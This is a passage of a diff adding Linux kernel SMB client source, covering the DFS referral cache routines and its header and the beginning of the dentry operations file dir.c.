++	down_write(&htable_rw_lock);
++
++	ce = lookup_cache_entry(npath);
++	if (IS_ERR(ce)) {
++		rc = PTR_ERR(ce);
++		goto out_unlock;
++	}
++
++	t = ce->tgthint;
++
++	if (likely(!strcasecmp(it->it_name, t->name)))
++		goto out_unlock;
++
++	list_for_each_entry(t, &ce->tlist, list) {
++		if (!strcasecmp(t->name, it->it_name)) {
++			ce->tgthint = t;
++			cifs_dbg(FYI, "%s: new target hint: %s\n", __func__,
++				 it->it_name);
++			break;
++		}
++	}
++
++out_unlock:
++	up_write(&htable_rw_lock);
++out_free_path:
++	kfree(npath);
++	return rc;
++}
++
++/**
++ * dfs_cache_noreq_update_tgthint - update target hint of a DFS cache entry
++ * without sending any requests to the currently connected server.
++ *
++ * NOTE: This function will neither update a cache entry in case it was
++ * expired, nor create a new cache entry if @path hasn't been found. It heavily
++ * relies on an existing cache entry.
++ *
++ * @path: canonical DFS path to lookup in DFS referral cache.
++ * @it: target iterator which contains the target hint to update the cache
++ * entry with.
++ *
++ * Return zero if the target hint was updated successfully, otherwise non-zero.
++ */
++int dfs_cache_noreq_update_tgthint(const char *path, const struct dfs_cache_tgt_iterator *it)
++{
++	int rc;
++	struct cache_entry *ce;
++	struct cache_dfs_tgt *t;
++
++	if (!it)
++		return -EINVAL;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
++
++	down_write(&htable_rw_lock);
++
++	ce = lookup_cache_entry(path);
++	if (IS_ERR(ce)) {
++		rc = PTR_ERR(ce);
++		goto out_unlock;
++	}
++
++	rc = 0;
++	t = ce->tgthint;
++
++	if (unlikely(!strcasecmp(it->it_name, t->name)))
++		goto out_unlock;
++
++	list_for_each_entry(t, &ce->tlist, list) {
++		if (!strcasecmp(t->name, it->it_name)) {
++			ce->tgthint = t;
++			cifs_dbg(FYI, "%s: new target hint: %s\n", __func__,
++				 it->it_name);
++			break;
++		}
++	}
++
++out_unlock:
++	up_write(&htable_rw_lock);
++	return rc;
++}
++
++/**
++ * dfs_cache_get_tgt_referral - returns a DFS referral (@ref) from a given
++ * target iterator (@it).
++ *
++ * @path: canonical DFS path to lookup in DFS referral cache.
++ * @it: DFS target iterator.
++ * @ref: DFS referral pointer to set up the gathered information.
++ *
++ * Return zero if the DFS referral was set up correctly, otherwise non-zero.
++ */
++int dfs_cache_get_tgt_referral(const char *path, const struct dfs_cache_tgt_iterator *it,
++			       struct dfs_info3_param *ref)
++{
++	int rc;
++	struct cache_entry *ce;
++
++	if (!it || !ref)
++		return -EINVAL;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
++
++	down_read(&htable_rw_lock);
++
++	ce = lookup_cache_entry(path);
++	if (IS_ERR(ce)) {
++		rc = PTR_ERR(ce);
++		goto out_unlock;
++	}
++
++	cifs_dbg(FYI, "%s: target name: %s\n", __func__, it->it_name);
++
++	rc = setup_referral(path, ce, ref, it->it_name);
++
++out_unlock:
++	up_read(&htable_rw_lock);
++	return rc;
++}
++
++/**
++ * dfs_cache_add_refsrv_session - add SMB session of referral server
++ *
++ * @mount_id: mount group uuid to lookup.
++ * @ses: reference counted SMB session of referral server.
++ */
++void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses)
++{
++	struct mount_group *mg;
++
++	if (WARN_ON_ONCE(!mount_id || uuid_is_null(mount_id) || !ses))
++		return;
++
++	mg = get_mount_group(mount_id);
++	if (WARN_ON_ONCE(IS_ERR(mg)))
++		return;
++
++	spin_lock(&mg->lock);
++	if (mg->num_sessions < ARRAY_SIZE(mg->sessions))
++		mg->sessions[mg->num_sessions++] = ses;
++	spin_unlock(&mg->lock);
++	kref_put(&mg->refcount, mount_group_release);
++}
++
++/**
++ * dfs_cache_put_refsrv_sessions - put all referral server sessions
++ *
++ * Put all SMB sessions from the given mount group id.
++ *
++ * @mount_id: mount group uuid to lookup.
++ */
++void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id)
++{
++	struct mount_group *mg;
++
++	if (!mount_id || uuid_is_null(mount_id))
++		return;
++
++	mutex_lock(&mount_group_list_lock);
++	mg = find_mount_group_locked(mount_id);
++	if (IS_ERR(mg)) {
++		mutex_unlock(&mount_group_list_lock);
++		return;
++	}
++	mutex_unlock(&mount_group_list_lock);
++	kref_put(&mg->refcount, mount_group_release);
++}
++
++/* Extract the share from a DFS target; return a pointer to its prefix path, or an ERR_PTR on error */
++static const char *parse_target_share(const char *target, char **share)
++{
++	const char *s, *seps = "/\\";
++	size_t len;
++
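++	/*
++	 * Skip past the server component to the first separator, then measure
++	 * the share name that follows it.
++	 */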
++	s = strpbrk(target + 1, seps);
++	if (!s)
++		return ERR_PTR(-EINVAL);
++
++	len = strcspn(s + 1, seps);
++	if (!len)
++		return ERR_PTR(-EINVAL);
++	s += len;
++
++	len = s - target + 1;
++	*share = kstrndup(target, len, GFP_KERNEL);
++	if (!*share)
++		return ERR_PTR(-ENOMEM);
++
++	s = target + len;
++	return s + strspn(s, seps);
++}
++
++/**
++ * dfs_cache_get_tgt_share - parse a DFS target
++ *
++ * @path: DFS full path
++ * @it: DFS target iterator.
++ * @share: tree name.
++ * @prefix: prefix path.
++ *
++ * Return zero if target was parsed correctly, otherwise non-zero.
++ */
++int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it, char **share,
++			    char **prefix)
++{
++	char sep;
++	char *target_share;
++	char *ppath = NULL;
++	const char *target_ppath, *dfsref_ppath;
++	size_t target_pplen, dfsref_pplen;
++	size_t len, c;
++
++	if (!it || !path || !share || !prefix || strlen(path) < it->it_path_consumed)
++		return -EINVAL;
++
++	sep = it->it_name[0];
++	if (sep != '\\' && sep != '/')
++		return -EINVAL;
++
++	target_ppath = parse_target_share(it->it_name, &target_share);
++	if (IS_ERR(target_ppath))
++		return PTR_ERR(target_ppath);
++
++	/* point to prefix in DFS referral path */
++	dfsref_ppath = path + it->it_path_consumed;
++	dfsref_ppath += strspn(dfsref_ppath, "/\\");
++
++	target_pplen = strlen(target_ppath);
++	dfsref_pplen = strlen(dfsref_ppath);
++
++	/* merge prefix paths from DFS referral path and target node */
++	if (target_pplen || dfsref_pplen) {
++		len = target_pplen + dfsref_pplen + 2;
++		ppath = kzalloc(len, GFP_KERNEL);
++		if (!ppath) {
++			kfree(target_share);
++			return -ENOMEM;
++		}
++		c = strscpy(ppath, target_ppath, len);
++		if (c && dfsref_pplen)
++			ppath[c] = sep;
++		strlcat(ppath, dfsref_ppath, len);
++	}
++	*share = target_share;
++	*prefix = ppath;
++	return 0;
++}
++
++static bool target_share_equal(struct TCP_Server_Info *server, const char *s1, const char *s2)
++{
++	char unc[sizeof("\\\\") + SERVER_NAME_LENGTH] = {0};
++	const char *host;
++	size_t hostlen;
++	char *ip = NULL;
++	struct sockaddr sa;
++	bool match;
++	int rc;
++
++	if (strcasecmp(s1, s2))
++		return false;
++
++	/*
++	 * Resolve the share's hostname and check whether the server address matches.  If we
++	 * have no upcall to resolve the hostname, or converting the ip address fails, just
++	 * assume it matches.
++	 */
++	match = true;
++	extract_unc_hostname(s1, &host, &hostlen);
++	scnprintf(unc, sizeof(unc), "\\\\%.*s", (int)hostlen, host);
++
++	rc = dns_resolve_server_name_to_ip(unc, &ip, NULL);
++	if (rc < 0) {
++		cifs_dbg(FYI, "%s: could not resolve %.*s. assuming server address matches.\n",
++			 __func__, (int)hostlen, host);
++		return true;
++	}
++
++	if (!cifs_convert_address(&sa, ip, strlen(ip))) {
++		cifs_dbg(VFS, "%s: failed to convert address \'%s\'. skip address matching.\n",
++			 __func__, ip);
++	} else {
++		cifs_server_lock(server);
++		match = cifs_match_ipaddr((struct sockaddr *)&server->dstaddr, &sa);
++		cifs_server_unlock(server);
++	}
++
++	kfree(ip);
++	return match;
++}
++
++/*
++ * Mark dfs tcon for reconnecting when the currently connected tcon does not match any of the new
++ * target shares in @refs.
++ */
++static void mark_for_reconnect_if_needed(struct cifs_tcon *tcon, struct dfs_cache_tgt_list *tl,
++					 const struct dfs_info3_param *refs, int numrefs)
++{
++	struct dfs_cache_tgt_iterator *it;
++	int i;
++
++	for (it = dfs_cache_get_tgt_iterator(tl); it; it = dfs_cache_get_next_tgt(tl, it)) {
++		for (i = 0; i < numrefs; i++) {
++			if (target_share_equal(tcon->ses->server, dfs_cache_get_tgt_name(it),
++					       refs[i].node_name))
++				return;
++		}
++	}
++
++	cifs_dbg(FYI, "%s: no cached or matched targets. mark dfs share for reconnect.\n", __func__);
++	cifs_signal_cifsd_for_reconnect(tcon->ses->server, true);
++}
++
++/* Refresh dfs referral of tcon and mark it for reconnect if needed */
++static int __refresh_tcon(const char *path, struct cifs_ses **sessions, struct cifs_tcon *tcon,
++			  bool force_refresh)
++{
++	struct cifs_ses *ses;
++	struct cache_entry *ce;
++	struct dfs_info3_param *refs = NULL;
++	int numrefs = 0;
++	bool needs_refresh = false;
++	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
++	int rc = 0;
++	unsigned int xid;
++
++	ses = find_ipc_from_server_path(sessions, path);
++	if (IS_ERR(ses)) {
++		cifs_dbg(FYI, "%s: could not find ipc session\n", __func__);
++		return PTR_ERR(ses);
++	}
++
++	down_read(&htable_rw_lock);
++	ce = lookup_cache_entry(path);
++	needs_refresh = force_refresh || IS_ERR(ce) || cache_entry_expired(ce);
++	if (!IS_ERR(ce)) {
++		rc = get_targets(ce, &tl);
++		if (rc)
++			cifs_dbg(FYI, "%s: could not get dfs targets: %d\n", __func__, rc);
++	}
++	up_read(&htable_rw_lock);
++
++	if (!needs_refresh) {
++		rc = 0;
++		goto out;
++	}
++
++	xid = get_xid();
++	rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
++	free_xid(xid);
++
++	/* Create or update a cache entry with the new referral */
++	if (!rc) {
++		dump_refs(refs, numrefs);
++
++		down_write(&htable_rw_lock);
++		ce = lookup_cache_entry(path);
++		if (IS_ERR(ce))
++			add_cache_entry_locked(refs, numrefs);
++		else if (force_refresh || cache_entry_expired(ce))
++			update_cache_entry_locked(ce, refs, numrefs);
++		up_write(&htable_rw_lock);
++
++		mark_for_reconnect_if_needed(tcon, &tl, refs, numrefs);
++	}
++
++out:
++	dfs_cache_free_tgts(&tl);
++	free_dfs_info_array(refs, numrefs);
++	return rc;
++}
++
++static int refresh_tcon(struct cifs_ses **sessions, struct cifs_tcon *tcon, bool force_refresh)
++{
++	struct TCP_Server_Info *server = tcon->ses->server;
++
++	mutex_lock(&server->refpath_lock);
++	if (server->origin_fullpath) {
++		if (server->leaf_fullpath && strcasecmp(server->leaf_fullpath,
++							server->origin_fullpath))
++			__refresh_tcon(server->leaf_fullpath + 1, sessions, tcon, force_refresh);
++		__refresh_tcon(server->origin_fullpath + 1, sessions, tcon, force_refresh);
++	}
++	mutex_unlock(&server->refpath_lock);
++
++	return 0;
++}
++
++/**
++ * dfs_cache_remount_fs - remount a DFS share
++ *
++ * Reconfigure dfs mount by forcing a new DFS referral and if the currently cached targets do not
++ * match any of the new targets, mark it for reconnect.
++ *
++ * @cifs_sb: cifs superblock.
++ *
++ * Return zero if remounted, otherwise non-zero.
++ */
++int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb)
++{
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct mount_group *mg;
++	struct cifs_ses *sessions[CACHE_MAX_ENTRIES + 1] = {NULL};
++	int rc;
++
++	if (!cifs_sb || !cifs_sb->master_tlink)
++		return -EINVAL;
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++	server = tcon->ses->server;
++
++	if (!server->origin_fullpath) {
++		cifs_dbg(FYI, "%s: not a dfs mount\n", __func__);
++		return 0;
++	}
++
++	if (uuid_is_null(&cifs_sb->dfs_mount_id)) {
++		cifs_dbg(FYI, "%s: no dfs mount group id\n", __func__);
++		return -EINVAL;
++	}
++
++	mutex_lock(&mount_group_list_lock);
++	mg = find_mount_group_locked(&cifs_sb->dfs_mount_id);
++	if (IS_ERR(mg)) {
++		mutex_unlock(&mount_group_list_lock);
++		cifs_dbg(FYI, "%s: no ipc session for refreshing referral\n", __func__);
++		return PTR_ERR(mg);
++	}
++	kref_get(&mg->refcount);
++	mutex_unlock(&mount_group_list_lock);
++
++	spin_lock(&mg->lock);
++	memcpy(&sessions, mg->sessions, mg->num_sessions * sizeof(mg->sessions[0]));
++	spin_unlock(&mg->lock);
++
++	/*
++	 * After reconnecting to a different server, unique ids won't match anymore, so we disable
++	 * serverino. This prevents dentry revalidation from thinking dentries are stale (ESTALE).
++	 */
++	cifs_autodisable_serverino(cifs_sb);
++	/*
++	 * Force the use of prefix path to support failover on DFS paths that resolve to targets
++	 * that have different prefix paths.
++	 */
++	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
++	rc = refresh_tcon(sessions, tcon, true);
++
++	kref_put(&mg->refcount, mount_group_release);
++	return rc;
++}
++
++/*
++ * Refresh all active dfs mounts regardless of whether they are in cache or not.
++ * (cache can be cleared)
++ */
++static void refresh_mounts(struct cifs_ses **sessions)
++{
++	struct TCP_Server_Info *server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon, *ntcon;
++	struct list_head tcons;
++
++	INIT_LIST_HEAD(&tcons);
++
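++	/*
++	 * Two passes: first grab extra references on the candidate tcons
++	 * under cifs_tcp_ses_lock, then refresh them (and drop the
++	 * references) outside the spinlock, since refreshing may sleep.
++	 */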
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++		spin_lock(&server->srv_lock);
++		if (!server->is_dfs_conn) {
++			spin_unlock(&server->srv_lock);
++			continue;
++		}
++		spin_unlock(&server->srv_lock);
++
++		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++				spin_lock(&tcon->tc_lock);
++				if (!tcon->ipc && !tcon->need_reconnect) {
++					tcon->tc_count++;
++					list_add_tail(&tcon->ulist, &tcons);
++				}
++				spin_unlock(&tcon->tc_lock);
++			}
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	list_for_each_entry_safe(tcon, ntcon, &tcons, ulist) {
++		struct TCP_Server_Info *server = tcon->ses->server;
++
++		list_del_init(&tcon->ulist);
++
++		mutex_lock(&server->refpath_lock);
++		if (server->origin_fullpath) {
++			if (server->leaf_fullpath && strcasecmp(server->leaf_fullpath,
++								server->origin_fullpath))
++				__refresh_tcon(server->leaf_fullpath + 1, sessions, tcon, false);
++			__refresh_tcon(server->origin_fullpath + 1, sessions, tcon, false);
++		}
++		mutex_unlock(&server->refpath_lock);
++
++		cifs_put_tcon(tcon);
++	}
++}
++
++static void refresh_cache(struct cifs_ses **sessions)
++{
++	int i;
++	struct cifs_ses *ses;
++	unsigned int xid;
++	char *ref_paths[CACHE_MAX_ENTRIES];
++	int count = 0;
++	struct cache_entry *ce;
++
++	/*
++	 * Refresh all cached entries.  Get all new referrals outside critical section to avoid
++	 * starvation while performing SMB2 IOCTL on broken or slow connections.
++	 *
++	 * The cache entries may cover more paths than the active mounts
++	 * (e.g. domain-based DFS referrals or multi tier DFS setups).
++	 */
++	down_read(&htable_rw_lock);
++	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
++		struct hlist_head *l = &cache_htable[i];
++
++		hlist_for_each_entry(ce, l, hlist) {
++			if (count == ARRAY_SIZE(ref_paths))
++				goto out_unlock;
++			if (hlist_unhashed(&ce->hlist) || !cache_entry_expired(ce) ||
++			    IS_ERR(find_ipc_from_server_path(sessions, ce->path)))
++				continue;
++			ref_paths[count++] = kstrdup(ce->path, GFP_ATOMIC);
++		}
++	}
++
++out_unlock:
++	up_read(&htable_rw_lock);
++
++	for (i = 0; i < count; i++) {
++		char *path = ref_paths[i];
++		struct dfs_info3_param *refs = NULL;
++		int numrefs = 0;
++		int rc = 0;
++
++		if (!path)
++			continue;
++
++		ses = find_ipc_from_server_path(sessions, path);
++		if (IS_ERR(ses))
++			goto next_referral;
++
++		xid = get_xid();
++		rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
++		free_xid(xid);
++
++		if (!rc) {
++			down_write(&htable_rw_lock);
++			ce = lookup_cache_entry(path);
++			/*
++			 * We need to re-check it because other tasks might have it deleted or
++			 * updated.
++			 */
++			if (!IS_ERR(ce) && cache_entry_expired(ce))
++				update_cache_entry_locked(ce, refs, numrefs);
++			up_write(&htable_rw_lock);
++		}
++
++next_referral:
++		kfree(path);
++		free_dfs_info_array(refs, numrefs);
++	}
++}
++
++/*
++ * Worker that will refresh DFS cache and active mounts based on lowest TTL value from a DFS
++ * referral.
++ */
++static void refresh_cache_worker(struct work_struct *work)
++{
++	struct list_head mglist;
++	struct mount_group *mg, *tmp_mg;
++	struct cifs_ses *sessions[CACHE_MAX_ENTRIES + 1] = {NULL};
++	int max_sessions = ARRAY_SIZE(sessions) - 1;
++	int i = 0, count;
++
++	INIT_LIST_HEAD(&mglist);
++
++	/* Get references of mount groups */
++	mutex_lock(&mount_group_list_lock);
++	list_for_each_entry(mg, &mount_group_list, list) {
++		kref_get(&mg->refcount);
++		list_add(&mg->refresh_list, &mglist);
++	}
++	mutex_unlock(&mount_group_list_lock);
++
++	/* Fill in local array with a NULL-terminated list of all referral server sessions */
++	list_for_each_entry(mg, &mglist, refresh_list) {
++		if (i >= max_sessions)
++			break;
++
++		spin_lock(&mg->lock);
++		if (i + mg->num_sessions > max_sessions)
++			count = max_sessions - i;
++		else
++			count = mg->num_sessions;
++		memcpy(&sessions[i], mg->sessions, count * sizeof(mg->sessions[0]));
++		spin_unlock(&mg->lock);
++		i += count;
++	}
++
++	if (sessions[0]) {
++		/* Refresh all active mounts and cached entries */
++		refresh_mounts(sessions);
++		refresh_cache(sessions);
++	}
++
++	list_for_each_entry_safe(mg, tmp_mg, &mglist, refresh_list) {
++		list_del_init(&mg->refresh_list);
++		kref_put(&mg->refcount, mount_group_release);
++	}
++
++	spin_lock(&cache_ttl_lock);
++	queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
++	spin_unlock(&cache_ttl_lock);
++}
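++
++/*
++ * Note: cache_ttl above tracks the lowest TTL seen in referral responses,
++ * so the worker re-arms itself to match what the DFS server advertises.
++ */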
+diff --git a/fs/smb/client/dfs_cache.h b/fs/smb/client/dfs_cache.h
+new file mode 100644
+index 0000000000000..52070d1df1897
+--- /dev/null
++++ b/fs/smb/client/dfs_cache.h
+@@ -0,0 +1,97 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * DFS referral cache routines
++ *
++ * Copyright (c) 2018-2019 Paulo Alcantara <palcantara@suse.de>
++ */
++
++#ifndef _CIFS_DFS_CACHE_H
++#define _CIFS_DFS_CACHE_H
++
++#include <linux/nls.h>
++#include <linux/list.h>
++#include <linux/uuid.h>
++#include "cifsglob.h"
++
++#define DFS_CACHE_TGT_LIST_INIT(var) { .tl_numtgts = 0, .tl_list = LIST_HEAD_INIT((var).tl_list), }
++
++struct dfs_cache_tgt_list {
++	int tl_numtgts;
++	struct list_head tl_list;
++};
++
++struct dfs_cache_tgt_iterator {
++	char *it_name;
++	int it_path_consumed;
++	struct list_head it_list;
++};
++
++int dfs_cache_init(void);
++void dfs_cache_destroy(void);
++extern const struct proc_ops dfscache_proc_ops;
++
++int dfs_cache_find(const unsigned int xid, struct cifs_ses *ses, const struct nls_table *cp,
++		   int remap, const char *path, struct dfs_info3_param *ref,
++		   struct dfs_cache_tgt_list *tgt_list);
++int dfs_cache_noreq_find(const char *path, struct dfs_info3_param *ref,
++			 struct dfs_cache_tgt_list *tgt_list);
++int dfs_cache_update_tgthint(const unsigned int xid, struct cifs_ses *ses,
++			     const struct nls_table *cp, int remap, const char *path,
++			     const struct dfs_cache_tgt_iterator *it);
++int dfs_cache_noreq_update_tgthint(const char *path, const struct dfs_cache_tgt_iterator *it);
++int dfs_cache_get_tgt_referral(const char *path, const struct dfs_cache_tgt_iterator *it,
++			       struct dfs_info3_param *ref);
++int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it, char **share,
++			    char **prefix);
++void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id);
++void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses);
++char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap);
++int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb);
++
++static inline struct dfs_cache_tgt_iterator *
++dfs_cache_get_next_tgt(struct dfs_cache_tgt_list *tl,
++		       struct dfs_cache_tgt_iterator *it)
++{
++	if (!tl || list_empty(&tl->tl_list) || !it ||
++	    list_is_last(&it->it_list, &tl->tl_list))
++		return NULL;
++	return list_next_entry(it, it_list);
++}
++
++static inline struct dfs_cache_tgt_iterator *
++dfs_cache_get_tgt_iterator(struct dfs_cache_tgt_list *tl)
++{
++	if (!tl)
++		return NULL;
++	return list_first_entry_or_null(&tl->tl_list,
++					struct dfs_cache_tgt_iterator,
++					it_list);
++}
++
++static inline void dfs_cache_free_tgts(struct dfs_cache_tgt_list *tl)
++{
++	struct dfs_cache_tgt_iterator *it, *nit;
++
++	if (!tl || list_empty(&tl->tl_list))
++		return;
++	list_for_each_entry_safe(it, nit, &tl->tl_list, it_list) {
++		list_del(&it->it_list);
++		kfree(it->it_name);
++		kfree(it);
++	}
++	tl->tl_numtgts = 0;
++}
++
++static inline const char *
++dfs_cache_get_tgt_name(const struct dfs_cache_tgt_iterator *it)
++{
++	return it ? it->it_name : NULL;
++}
++
++static inline int
++dfs_cache_get_nr_tgts(const struct dfs_cache_tgt_list *tl)
++{
++	return tl ? tl->tl_numtgts : 0;
++}
++
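++/*
++ * Typical walk over a populated target list (illustrative only; error
++ * handling omitted):
++ *
++ *	struct dfs_cache_tgt_iterator *it;
++ *
++ *	for (it = dfs_cache_get_tgt_iterator(&tl); it;
++ *	     it = dfs_cache_get_next_tgt(&tl, it))
++ *		pr_info("target: %s\n", dfs_cache_get_tgt_name(it));
++ *	dfs_cache_free_tgts(&tl);
++ */
++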
++#endif /* _CIFS_DFS_CACHE_H */
+diff --git a/fs/smb/client/dir.c b/fs/smb/client/dir.c
+new file mode 100644
+index 0000000000000..e382b794acbed
+--- /dev/null
++++ b/fs/smb/client/dir.c
+@@ -0,0 +1,867 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   vfs operations that deal with dentries
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2009
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/stat.h>
++#include <linux/slab.h>
++#include <linux/namei.h>
++#include <linux/mount.h>
++#include <linux/file.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "fs_context.h"
++#include "cifs_ioctl.h"
++#include "fscache.h"
++
++static void
++renew_parental_timestamps(struct dentry *direntry)
++{
++	/* BB check if there is a way to get the kernel to do this or if we
++	   really need this */
++	do {
++		cifs_set_time(direntry, jiffies);
++		direntry = direntry->d_parent;
++	} while (!IS_ROOT(direntry));
++}
++
++char *
++cifs_build_path_to_root(struct smb3_fs_context *ctx, struct cifs_sb_info *cifs_sb,
++			struct cifs_tcon *tcon, int add_treename)
++{
++	int pplen = ctx->prepath ? strlen(ctx->prepath) + 1 : 0;
++	int dfsplen;
++	char *full_path = NULL;
++
++	/* if no prefix path, simply set the path to the share root, i.e. "" */
++	if (pplen == 0) {
++		full_path = kzalloc(1, GFP_KERNEL);
++		return full_path;
++	}
++
++	if (add_treename)
++		dfsplen = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1);
++	else
++		dfsplen = 0;
++
++	full_path = kmalloc(dfsplen + pplen + 1, GFP_KERNEL);
++	if (full_path == NULL)
++		return full_path;
++
++	if (dfsplen)
++		memcpy(full_path, tcon->tree_name, dfsplen);
++	full_path[dfsplen] = CIFS_DIR_SEP(cifs_sb);
++	memcpy(full_path + dfsplen + 1, ctx->prepath, pplen);
++	convert_delimiter(full_path, CIFS_DIR_SEP(cifs_sb));
++	return full_path;
++}
++
++/* Note: caller must free return buffer */
++const char *
++build_path_from_dentry(struct dentry *direntry, void *page)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	bool prefix = tcon->Flags & SMB_SHARE_IS_IN_DFS;
++
++	return build_path_from_dentry_optional_prefix(direntry, page,
++						      prefix);
++}
++
++char *
++build_path_from_dentry_optional_prefix(struct dentry *direntry, void *page,
++				       bool prefix)
++{
++	int dfsplen;
++	int pplen = 0;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	char dirsep = CIFS_DIR_SEP(cifs_sb);
++	char *s;
++
++	if (unlikely(!page))
++		return ERR_PTR(-ENOMEM);
++
++	if (prefix)
++		dfsplen = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1);
++	else
++		dfsplen = 0;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
++		pplen = cifs_sb->prepath ? strlen(cifs_sb->prepath) + 1 : 0;
++
++	s = dentry_path_raw(direntry, page, PATH_MAX);
++	if (IS_ERR(s))
++		return s;
++	if (!s[1])	// for root we want "", not "/"
++		s++;
++	if (s < (char *)page + pplen + dfsplen)
++		return ERR_PTR(-ENAMETOOLONG);
++	if (pplen) {
++		cifs_dbg(FYI, "using cifs_sb prepath <%s>\n", cifs_sb->prepath);
++		s -= pplen;
++		memcpy(s + 1, cifs_sb->prepath, pplen - 1);
++		*s = '/';
++	}
++	if (dirsep != '/') {
++		/* BB test paths to Windows with '/' in the midst of prepath */
++		char *p;
++
++		for (p = s; *p; p++)
++			if (*p == '/')
++				*p = dirsep;
++	}
++	if (dfsplen) {
++		s -= dfsplen;
++		memcpy(s, tcon->tree_name, dfsplen);
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS) {
++			int i;
++			for (i = 0; i < dfsplen; i++) {
++				if (s[i] == '\\')
++					s[i] = '/';
++			}
++		}
++	}
++	return s;
++}
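++
++/*
++ * For illustration (hypothetical values): with prefix=true, tree_name
++ * "\\srv\share", prepath "sub" and a dentry at "/dir/file", the page
++ * buffer is filled right to left and the returned pointer references
++ * "\\srv\share\sub\dir\file" (with '\' as the dir separator).
++ */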
++
++/*
++ * Don't allow path components longer than the server max.
++ * Don't allow the separator character in a path component.
++ * The VFS will not allow "/", but "\" is allowed by posix.
++ */
++static int
++check_name(struct dentry *direntry, struct cifs_tcon *tcon)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
++	int i;
++
++	if (unlikely(tcon->fsAttrInfo.MaxPathNameComponentLength &&
++		     direntry->d_name.len >
++		     le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength)))
++		return -ENAMETOOLONG;
++
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)) {
++		for (i = 0; i < direntry->d_name.len; i++) {
++			if (direntry->d_name.name[i] == '\\') {
++				cifs_dbg(FYI, "Invalid file name\n");
++				return -EINVAL;
++			}
++		}
++	}
++	return 0;
++}
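++
++/*
++ * e.g. a name component such as "foo\bar" is rejected above with
++ * -EINVAL unless the mount uses posixpaths
++ */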
++
++
++/* Inode operations in similar order to how they appear in Linux file fs.h */
++
++static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned int xid,
++			  struct tcon_link *tlink, unsigned int oflags, umode_t mode, __u32 *oplock,
++			  struct cifs_fid *fid, struct cifs_open_info_data *buf)
++{
++	int rc = -ENOENT;
++	int create_options = CREATE_NOT_DIR;
++	int desired_access;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_tcon *tcon = tlink_tcon(tlink);
++	const char *full_path;
++	void *page = alloc_dentry_path();
++	struct inode *newinode = NULL;
++	int disposition;
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifs_open_parms oparms;
++
++	*oplock = 0;
++	if (tcon->ses->server->oplocks)
++		*oplock = REQ_OPLOCK;
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		free_dentry_path(page);
++		return PTR_ERR(full_path);
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (tcon->unix_ext && cap_unix(tcon->ses) && !tcon->broken_posix_open &&
++	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
++			le64_to_cpu(tcon->fsUnixInfo.Capability))) {
++		rc = cifs_posix_open(full_path, &newinode, inode->i_sb, mode,
++				     oflags, oplock, &fid->netfid, xid);
++		switch (rc) {
++		case 0:
++			if (newinode == NULL) {
++				/* query inode info */
++				goto cifs_create_get_file_info;
++			}
++
++			if (S_ISDIR(newinode->i_mode)) {
++				CIFSSMBClose(xid, tcon, fid->netfid);
++				iput(newinode);
++				rc = -EISDIR;
++				goto out;
++			}
++
++			if (!S_ISREG(newinode->i_mode)) {
++				/*
++				 * The server may allow us to open things like
++				 * FIFOs, but the client isn't set up to deal
++				 * with that. If it's not a regular file, just
++				 * close it and proceed as if it were a normal
++				 * lookup.
++				 */
++				CIFSSMBClose(xid, tcon, fid->netfid);
++				goto cifs_create_get_file_info;
++			}
++			/* success, no need to query */
++			goto cifs_create_set_dentry;
++
++		case -ENOENT:
++			goto cifs_create_get_file_info;
++
++		case -EIO:
++		case -EINVAL:
++			/*
++			 * EIO could indicate that (posix open) operation is not
